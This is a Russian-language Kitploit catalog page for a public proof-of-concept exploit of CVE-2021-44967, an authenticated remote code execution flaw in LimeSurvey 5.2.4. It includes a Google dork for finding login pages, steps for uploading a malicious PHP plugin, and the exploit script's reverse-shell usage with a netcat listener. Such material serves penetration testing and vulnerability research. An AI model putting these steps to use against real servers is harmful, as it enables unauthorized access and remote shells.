Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44967 — PoC-эксплойт для CVE-2021-44967 | Kitploit
Инструменты/GitHubGitHub/d3ext/cve-2021-44967
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubd3ext/cve-2021-44967

CVE-2021-44967

PoC-эксплойт для CVE-2021-44967

Репозиторий
611 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

Объяснение

В LimeSurvey 5.2.4 существует уязвимость удалённого выполнения кода (RCE) через функцию загрузки и установки плагинов, которая позволяет удалённому злоумышленнику загружать произвольный PHP-файл.

Для ручной эксплуатации этой уязвимости необходимо выполнить следующие шаги:

  1. Создайте ZIP-архив, содержащий PHP-файл и файл конфигурации
  2. Войдите в LimeSurvey
  3. Перейдите в Configuration -> Plugins -> Upload & Install
  4. Загрузите ваш ZIP-файл
  5. Установите его
  6. Наконец, активируйте ваш плагин
  7. Затем ваш PHP-код должен быть доступен по адресу /upload/plugins/<plugin_name>/<php_file>

Использование

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

Запустите netcat-слушатель, а затем выполните эксплойт следующим образом:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

Демонстрация

Ссылки

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

Лицензия

Этот проект распространяется под лицензией MIT

Авторские права © 2025, D3Ext

Скачать инструмент